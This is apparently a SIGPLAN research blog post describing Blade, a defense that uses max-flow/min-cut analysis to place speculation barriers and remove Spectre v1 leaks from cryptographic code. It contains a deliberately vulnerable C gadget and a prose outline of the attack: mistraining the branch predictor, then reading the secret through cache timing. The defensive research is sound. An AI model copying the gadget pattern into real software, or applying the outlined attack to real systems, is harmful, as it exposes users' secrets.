Implementing cryptographic algorithms securely is hard. Not only does the code need to be functionally correct, memory safe, and efficient, it must also avoid indirectly exposing our secrets through side channels like control-flow, memory-access patterns, or execution time. In fact, this is such a hard problem that there’s been a lot of recent work on securing cryptographic implementations, e.g., by finding bugs in them, proving them to be secure, or transforming them to be secure.
In January 2018, Spectre attacks threw a wrench into this entire line of work. Spectre demonstrated that speculative execution can reveal cryptographic secrets to attackers, even in code that is secure from “traditional” side channel attacks. With speculative execution, the attacker can trick the processor into temporarily ignoring carefully-placed guards and bounds checks—long enough for the secrets to leak via side-channels. In theory, fence instructions stop speculation and so can eliminate Spectre attacks. In practice, for real cryptographic implementations, it’s not clear where we should insert the fences. To be on the safe side, we could insert fences after every load like Microsoft’s Visual Studio compiler does, but this results in extremely slow code (e.g., on the order of 10×). Alternatively, we could just make educated guesses about where to place fences; this results in fewer fences and faster code, but missing even a single fence can compromise the entire program.
This blog post describes Blade, our fully automatic approach to provably and efficiently eliminate speculative leaks from cryptographic code. Blade is based on a simple insight: To stop leaks via speculative execution, we don’t actually need to stop all speculation. Instead, we only need to cut the data flow from expressions that could speculatively introduce secrets (sources), to expressions that leak them via side-channels (sinks). In this blog post, we give a general overview of Blade and how it works. You can find more details about it in our POPL 2021 Distinguished Paper, or in this 15-minute video.
Speculative Leaks in Cryptographic Implementations
Imagine that our cryptographic library contains this function:
int A[32]; int B[32]; void foo(int i, int j) { if (i < 32 && j < 32) { int x = A[i]; int y = A[j]; int z = x + y; int w = B[z]; ... } }
During normal, sequential execution this function is not a problem: we have bounds checks to prevent the caller from accessing out-of-bounds data (which might contain secrets). However, during speculation, an attacker can exploit this function to leak sensitive data.
To do this, the attacker first has to mistrain the branch predictor so that it predicts the bounds check will pass. For example, the attacker can do this by calling the function repeatedly with in-bounds values for parameters i
and j
.
After mistraining the branch predictor this way, the attacker manipulates i
or j
to carefully-chosen out-of-bounds values, such that A[i]
or A[j]
actually points at some secret data elsewhere in memory. Then, the attacker calls the function again. Because of the mistraining, the processor skips the bounds check and loads A[i]
or A[j]
—putting secret data into x
or y
.
The secret data in x
or y
is in turn used to calculate z
and then to access B[z]
. But this leaks the secret! Even though the processor will discard these values when it discovers the misspeculation, the side-effects of the memory accesses persist in the cache. In particular, from the access B[z]
, the attacker can extract the value of z
—the secret—by using cache timing measurements.
Eliminating Speculative Leaks
To eliminate the leak in this example, we can insert a fence instruction anywhere between the bounds check and w = B[z]
. This fence guarantees that everything before it (including the bounds check) finishes executing before anything after it starts executing, even speculatively.
But fences are actually more restrictive than necessary—they stop speculative execution of all the following instructions, not only of the instructions that leak, and so incur unnecessary performance costs.
All we really need is a way to ensure that potentially secret data resulting from speculative loads cannot be leaked. More specifically, we only need to prevent data flows from source expressions which may speculatively load secret data—in this case, A[i]
—to sink expressions that leak them through the cache, such as the expression B[z]
. To eliminate source-to-sink data flows, we propose a new primitive called protect
. This protect
does not stop all speculation like fences do. Instead, protect
only stops speculation along a particular data-flow path.
Using protect
, we can patch the example above by changing the lines defining x
and y
to:
int x = protect(A[i]); int y = protect(A[j]);
This ensures that the values assigned to x
and y
are always the final, nonspeculative values, and thus prevents the dangerous speculation involving incorrect speculative values of x
or y
. But, crucially, it allows all other speculation (which doesn’t involve x
or y
) to continue, so that the overall performance impact is minimal.
It would be great if future hardware included direct support for protect
—for instance, through some kind of “fine-grained” fence. In the meantime, we can implement protect
using the hardware we have today. We measured two implementations: One implements protect
by using a standard x86 speculation fence. The other version implements protect
by securely masking the load address of the value being protected—a mitigation inspired by speculative load hardening (SLH). This second version is something like a software implementation of the ideal “fine-grained” fence we’d like in hardware. We’ll describe our implementations a bit more later.
Automatically Repairing Speculative Leaks
Up to this point, we still haven’t solved the major problem we identified at the beginning of this post—how to determine where exactly we should place our protect
statements (e.g., fences). Blade solves this problem by analyzing the data-flow graph of the program and determining where cuts are needed in order to ensure that potentially-speculatively-secret data can’t flow from sources to sinks.
Here’s the relevant part of the data-flow graph for our example program:
We connect the special node T to all expressions which could speculatively result in secret data; we call these sources. In our example program, A[i]
and A[j]
are sources, because if the bounds check is speculatively bypassed, an attacker could cause those expressions to result in secret data. Likewise, we connect all sinks to the special node S; sinks are expressions that must not be allowed to contain secret data in cryptographic code (e.g., because they are used as memory addresses or branch conditions). In this case, z
is a sink, because it is used in a memory address. Our goal is to prevent any data from flowing from sources to sinks; in the graph, this means that we want there to be no path from T to S.
Unfortunately, we can see that this graph contains a path from T to S. This means that our example program is insecure: Secret data could be leaked due to speculative execution.
In order to make the program safe, we need to cut the dataflow from T to S by introducing protect
statements. This means that we need to pick some subset of variables in the graph to protect
, such that after removing those variables, there is no longer a path from T to S. For instance, we could pick the two variables in the set outlined in orange in the diagram. This cut is safe—no path exists from T to S after removing these variables—but suboptimal: It requires two protect
statements. The cut shown in green is much better: It is equally safe, and requires only one protect
statement.
Thankfully, the problem of finding a minimal cut is an instance of the classic Max-Flow/Min-Cut problem, which can be solved using efficient, polynomial-time algorithms. Blade uses these algorithms to find a cut containing as few variables as possible and so requiring the fewest protect
statements. One could easily imagine optimizations that take into account how many times each instruction is executed, or try to avoid placing protect
statements inside loops; but our experiments show that even the simple model results in only modest performance overheads, as we’ll see shortly.
Implementation and Evaluation
We implemented Blade as a compilation pass in the Cranelift code-generator for WebAssembly (Wasm). We then evaluated our Blade implementation on a collection of verified constant-time cryptographic functions from CT-Wasm and HACL*.
Across our benchmarks, we found that the version of Blade which uses fences to implement protect
incurs an average of 5.0% runtime overhead to protect from Spectre v1 (the first-discovered variant of Spectre). The version of Blade which uses secure masking of load addresses (SLH) does even better, only 1.7% overhead. In contrast, baseline schemes that protect
every source in the data-flow graph rather than finding the min-cut, incur 80.2% overhead (fences) or 19.4% overhead (SLH). You can find a lot more results and analysis in our paper.
Proving Programs Speculatively Secure
We developed a type system in order to prove that programs repaired by Blade are indeed secure from speculative side-channel attacks. In fact, our type system can be used to prove security properties independently of what algorithm is used to insert protect
statements: Max-Flow/Min-Cut, manual insertion by the programmer, or even random guessing—if the resulting program is secure according to Blade’s rules, our type system will prove it. You can find more details about our type system, and the just-in-time-step semantics we used in the proofs, in our paper.
Conclusion
We’ve described how Blade provides a fully automatic approach to provably and efficiently eliminate speculation-based leakage in unannotated, constant-time cryptographic code. Blade statically detects data flows which could speculatively leak data, and automatically inserts a minimal number of protections (fences or SLH) so that repaired programs are secure and efficient. In the future, we hope to apply the principles behind Blade to protect arbitrary code (and not just constant-time cryptographic code) with the same provable guarantees.
Bio: Craig Disselkoen is a PhD candidate in computer science at UC San Diego, and Marco Vassena is a postdoc at the CISPA-Stanford Center for Cybersecurity.
Disclaimer: These posts are written by individual contributors to share their thoughts on the SIGPLAN blog for the benefit of the community. Any views or opinions represented in this blog are personal, belong solely to the blog author and do not represent those of ACM SIGPLAN or its parent organization, ACM.